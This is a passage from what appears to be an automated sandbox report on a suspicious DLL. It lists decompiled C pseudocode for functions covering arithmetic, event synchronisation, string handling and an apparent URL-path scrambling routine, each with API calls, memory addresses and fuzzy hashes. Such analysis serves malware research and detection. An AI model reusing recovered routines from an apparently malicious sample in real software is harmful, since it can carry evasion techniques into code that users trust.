                                • SysFreeString.OLEAUT32(00000000), ref: 00D414FD
                                  • Part of subcall function 00D452B9: Sleep.KERNEL32(000001F4), ref: 00D45301
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 1673420d248cb07fc7c15170e43edf8cfa7fc6bc2a8ddd5fd6833b4a1ab9154a
                                • Instruction ID: 390e2c3647fa77607e60d34f589ffe4cb974c53f46f68f1b77787663f11298ec
                                • Opcode Fuzzy Hash: 1673420d248cb07fc7c15170e43edf8cfa7fc6bc2a8ddd5fd6833b4a1ab9154a
                                • Instruction Fuzzy Hash: BD515039900609EFDB11CFA8D844A9EB7B6FF88710B148869E919DB360DB71ED45CB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D429ED, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E00D429ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00D48B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00D44AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00D42F01(_t101,  &_v236, _a8, _t96 - _t81);
					E00D42F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00D44AA4(_t101, 0xd4d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00D44AA4(_a16, _a4);
						E00D428BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00D4AF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00D4AF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00D49947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00D44506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00D4A708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xd4d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x00d429f0
                                0x00d429fc
                                0x00d42a02
                                0x00d42a07
                                0x00d42a0b
                                0x00d42b68
                                0x00d42b6c
                                0x00d42b6c
                                0x00d42a11
                                0x00d42a15
                                0x00d42a19
                                0x00d42a1c
                                0x00d42a27
                                0x00d42a2d
                                0x00d42a32
                                0x00d42a35
                                0x00d42a4f
                                0x00d42a5b
                                0x00d42a64
                                0x00d42a6e
                                0x00d42a73
                                0x00d42a75
                                0x00d42a78
                                0x00d42b26
                                0x00d42b2c
                                0x00d42b3d
                                0x00d42b50
                                0x00d42b60
                                0x00000000
                                0x00d42b65
                                0x00d42a81
                                0x00d42a88
                                0x00d42a8c
                                0x00d42a92
                                0x00d42a94
                                0x00d42a96
                                0x00d42a98
                                0x00d42a9a
                                0x00d42aa4
                                0x00d42aa9
                                0x00d42aab
                                0x00d42aad
                                0x00d42aae
                                0x00d42aaf
                                0x00d42ab0
                                0x00d42ab7
                                0x00d42abe
                                0x00d42ac1
                                0x00d42ac1
                                0x00d42a8e
                                0x00d42a8e
                                0x00d42a8e
                                0x00d42ac9
                                0x00d42ad1
                                0x00d42ada
                                0x00d42adf
                                0x00d42adf
                                0x00d42ae4
                                0x00000000
                                0x00000000
                                0x00d42ae6
                                0x00d42ae9
                                0x00d42af3
                                0x00000000
                                0x00000000
                                0x00d42af5
                                0x00d42af5
                                0x00d42aff
                                0x00d42adf
                                0x00d42ae4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d42ae4
                                0x00d42b09
                                0x00d42b0c
                                0x00d42b0f
                                0x00d42b16
                                0x00d42b16
                                0x00d42b23
                                0x00000000
                                0x00d42b23
                                0x00d42a1e
                                0x00d42a22
                                0x00d42a23
                                0x00d42a25
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d42a25
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00D42A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00D42AB0
                                • memset.NTDLL ref: 00D42B50
                                • memset.NTDLL ref: 00D42B60
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: fe236909aebbf64d270c55f539e34065538f043aaacb9e6a3b2c1edfe8bd196d
                                • Instruction ID: 1dc08bff818945c6061c9aaf1c8a8f01455e949aa6ab773719d1157b9bea0165
                                • Opcode Fuzzy Hash: fe236909aebbf64d270c55f539e34065538f043aaacb9e6a3b2c1edfe8bd196d
                                • Instruction Fuzzy Hash: 7D418171A00219ABDB20DFA8CC82BEE7775EF44710F548529FD15AB280DB70AE49CB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D46150, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E00D46150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xd4d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xd4d2a8; // 0x253a5a8
				_t3 = _t8 + 0xd4e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E00D410B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xd4d2ac, 1, 0, _t30);
					E00D48B22(_t30);
				}
				_t12 =  *0xd4d25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00D48F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00D43485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xd4d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00D48B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                0x00d46151
                                0x00d46158
                                0x00d46162
                                0x00d46166
                                0x00d4616c
                                0x00d4617b
                                0x00d46182
                                0x00d46186
                                0x00d46198
                                0x00d4619a
                                0x00d4619a
                                0x00d4619f
                                0x00d461a6
                                0x00d461fd
                                0x00d461fd
                                0x00d46203
                                0x00d46205
                                0x00d46205
                                0x00d4620f
                                0x00d46213
                                0x00d46225
                                0x00d46225
                                0x00d46229
                                0x00d4622f
                                0x00d4622f
                                0x00000000
                                0x00d461bf
                                0x00d461c4
                                0x00d461cc
                                0x00d461d0
                                0x00d461d4
                                0x00d461d4
                                0x00d461e1
                                0x00d461e5
                                0x00d461e9
                                0x00d4623e
                                0x00d46244
                                0x00d46244
                                0x00d461f7
                                0x00d461fb
                                0x00d46232
                                0x00d46234
                                0x00d46237
                                0x00d46237
                                0x00000000
                                0x00d46234
                                0x00d461fb
                                0x00000000
                                0x00d461e5

                                APIs
                                  • Part of subcall function 00D410B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,03289D18,00000000,?,?,69B25F44,00000005,00D4D00C,?,?,00D430FE), ref: 00D410E7
                                  • Part of subcall function 00D410B1: lstrcpy.KERNEL32(00000000,00000000), ref: 00D4110B
                                  • Part of subcall function 00D410B1: lstrcat.KERNEL32(00000000,00000000), ref: 00D41113
                                • CreateEventA.KERNEL32(00D4D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00D4991F,?,00000001,?), ref: 00D46191
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,00D4991F,00000000,00000000,?,00000000,?,00D4991F,?,00000001,?,?,?,?,00D47D37), ref: 00D461F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00D4991F,?,00000001,?), ref: 00D4621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00D4991F,?,00000001,?,?,?,?,00D47D37), ref: 00D46237
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 8702c0d6477f1518a3701da51f583182602081855d7d883c97e51a0d6814c8c7
                                • Instruction ID: 3667cb97868b3776c9061f449595c53b93b73a005f8068df44d77f87f1e34b63
                                • Opcode Fuzzy Hash: 8702c0d6477f1518a3701da51f583182602081855d7d883c97e51a0d6814c8c7
                                • Instruction Fuzzy Hash: 7B213532A01311ABCB315F789CC4A6B7399EF8AB50F090625FD47EB211DBB0CC41867A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D49870, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 40%
                                			E00D49870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00D42931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00D48DAB(_t23);
						}
					}
					return _t38;
				}
				if(E00D4155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xd4d2ac, 1, 0,  *0xd4d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00D45BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00D44B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00D44FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00D46150( &_v32, _t39);
					goto L13;
				}
			}












                                0x00d49870
                                0x00d4987d
                                0x00d49883
                                0x00d49884
                                0x00d49885
                                0x00d49886
                                0x00d49887
                                0x00d4988b
                                0x00d49897
                                0x00d4989b
                                0x00d49923
                                0x00d49923
                                0x00d49926
                                0x00d49928
                                0x00d49930
                                0x00d49930
                                0x00d49936
                                0x00d49939
                                0x00d49939
                                0x00d49936
                                0x00d49944
                                0x00d49944
                                0x00d498ae
                                0x00d498b0
                                0x00d498b0
                                0x00d498c7
                                0x00d498cb
                                0x00d498ce
                                0x00d498d9
                                0x00d498e0
                                0x00d498e0
                                0x00d498e9
                                0x00d498ed
                                0x00d498fb
                                0x00d498ef
                                0x00d498ef
                                0x00d498f0
                                0x00d498f1
                                0x00d498f2
                                0x00d498f3
                                0x00d498f4
                                0x00d498f4
                                0x00d49900
                                0x00d49903
                                0x00d49907
                                0x00d49909
                                0x00d49909
                                0x00d49910
                                0x00000000
                                0x00d49912
                                0x00d49912
                                0x00d4991f
                                0x00000000
                                0x00d4991f

                                APIs
                                • CreateEventA.KERNEL32(00D4D2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,00D47D37,?,00000001,?), ref: 00D498C1
                                • SetEvent.KERNEL32(00000000,?,?,?,00D47D37,?,00000001,?,00000002,?,?,00D4312C,?), ref: 00D498CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,00D47D37,?,00000001,?,00000002,?,?,00D4312C,?), ref: 00D498D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,00D47D37,?,00000001,?,00000002,?,?,00D4312C,?), ref: 00D498E0
                                  • Part of subcall function 00D45BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,00D49900,?,00D49900,?,?,?,?,?,00D49900,?), ref: 00D45C9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: c069a6137c6549823f25083066ce5fe633518c5e390bb38c845615aca85d1cdd
                                • Instruction ID: 1a66444ea74722c015ae3dd6438e7b2e9d705360d1e77a4c5d7e0f6e7daab083
                                • Opcode Fuzzy Hash: c069a6137c6549823f25083066ce5fe633518c5e390bb38c845615aca85d1cdd
                                • Instruction Fuzzy Hash: 2A21A177D00219AFCB20AFE688859EFB3B9EF49350B095429FA51E7200DB70DD458BB1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D45F58, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E00D45F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00D41525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x00d45f64
                                0x00d45f68
                                0x00d45f69
                                0x00d45f6a
                                0x00d45f6c
                                0x00d45f6e
                                0x00d45f71
                                0x00d45f76
                                0x00d4600d
                                0x00d46014
                                0x00d46014
                                0x00d45f7f
                                0x00d45f86
                                0x00d45f96
                                0x00d45f96
                                0x00d45f9c
                                0x00d45f9e
                                0x00d45fa3
                                0x00d45fac
                                0x00d45fb2
                                0x00d45fb7
                                0x00d45fc2
                                0x00d45fc6
                                0x00d45fc8
                                0x00d45fc9
                                0x00d45fd2
                                0x00d45fd6
                                0x00d45fe7
                                0x00d45fd8
                                0x00d45fdd
                                0x00d45fe2
                                0x00d45ff1
                                0x00d45ff1
                                0x00d45fc6
                                0x00d45ff7
                                0x00d45ffd
                                0x00d45ffd
                                0x00d46006
                                0x00d4600b
                                0x00d4600b
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: e5b262f53cb61013e1f3e2a7d5f6fd3df88a4598af6d4bddd6efcb83b6c4c63d
                                • Instruction ID: 61128ea56d46e82ed5b058d7c4e9ec155fbc6a931c4f7da28d827b43d6217926
                                • Opcode Fuzzy Hash: e5b262f53cb61013e1f3e2a7d5f6fd3df88a4598af6d4bddd6efcb83b6c4c63d
                                • Instruction Fuzzy Hash: 65217F79901609EFCB11DFA8D88499EBBB8FF49300B144169E906E7315EB30DA44CF71
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4A41C, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E00D4A41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xd4d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xd4d250; // 0xad3c1077
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xd4d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x00d4a424
                                0x00d4a427
                                0x00d4a42d
                                0x00d4a445
                                0x00d4a447
                                0x00d4a44c
                                0x00d4a44e
                                0x00d4a451
                                0x00d4a453
                                0x00d4a456
                                0x00d4a458
                                0x00d4a458
                                0x00d4a45a
                                0x00d4a465
                                0x00d4a46a
                                0x00d4a47b
                                0x00d4a483
                                0x00d4a488
                                0x00d4a48b
                                0x00d4a48e
                                0x00d4a490
                                0x00d4a493
                                0x00d4a496
                                0x00d4a496
                                0x00d4a499
                                0x00d4a4a4
                                0x00d4a4a9
                                0x00d4a4b3

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00D47C20,00000000,?,?,00D49DA0,?,032895B0), ref: 00D4A427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00D4A43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00D47C20,00000000,?,?,00D49DA0,?,032895B0), ref: 00D4A483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 00D4A4A4
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: b54086d300dc636fe3efe951435980f595fe47a793a912226a12d9648064d9bf
                                • Instruction ID: 51dc3dbd214ec09f565e321a1838d0dbcc6876a9ad89c1284358188cdffaa1a0
                                • Opcode Fuzzy Hash: b54086d300dc636fe3efe951435980f595fe47a793a912226a12d9648064d9bf
                                • Instruction Fuzzy Hash: 2411E976A00214AFC7108FA9DC88D9EBBAFDBC5361B050276F508DB291E7B09E04C775
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D48C01, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D48C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                0x00d48c0b
                                0x00d48c0f
                                0x00d48c24
                                0x00d48c26
                                0x00d48c2b
                                0x00d48c31
                                0x00d48c33
                                0x00d48c38
                                0x00d48c43
                                0x00d48c3a
                                0x00d48c3a
                                0x00d48c3a
                                0x00d48c38
                                0x00d48c51

                                APIs
                                • memset.NTDLL ref: 00D48C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 00D48C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00D48C31
                                • CloseHandle.KERNEL32(?), ref: 00D48C43
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 236a364a88594c77b00935f14c2ed06ba2dc3c5b4af057cca4eddb679a5d8847
                                • Instruction ID: f39fdac323d98a186ab4c38f0bf80d8d5309a00745fa25f6f630923e28e66c97
                                • Opcode Fuzzy Hash: 236a364a88594c77b00935f14c2ed06ba2dc3c5b4af057cca4eddb679a5d8847
                                • Instruction Fuzzy Hash: E4F082B510530CBFD360AF26DCC4C2BBBACEB42299B15492EF142D2111CA72AC499AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D44DB1, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D44DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xd4d26c; // 0x208
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xd4d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xd4d26c; // 0x208
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xd4d238; // 0x2e90000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x00d44db1
                                0x00d44db8
                                0x00d44e02
                                0x00d44e04
                                0x00d44e04
                                0x00d44dbc
                                0x00d44dc2
                                0x00d44dc7
                                0x00d44dcb
                                0x00d44dd1
                                0x00d44dd8
                                0x00000000
                                0x00000000
                                0x00d44dda
                                0x00d44ddf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d44ddf
                                0x00d44de1
                                0x00d44de9
                                0x00d44dec
                                0x00d44dec
                                0x00d44df2
                                0x00d44df9
                                0x00d44dfc
                                0x00d44dfc
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(00000208,00000001,00D47F41), ref: 00D44DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 00D44DCB
                                • CloseHandle.KERNEL32(00000208), ref: 00D44DEC
                                • HeapDestroy.KERNEL32(02E90000), ref: 00D44DFC
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
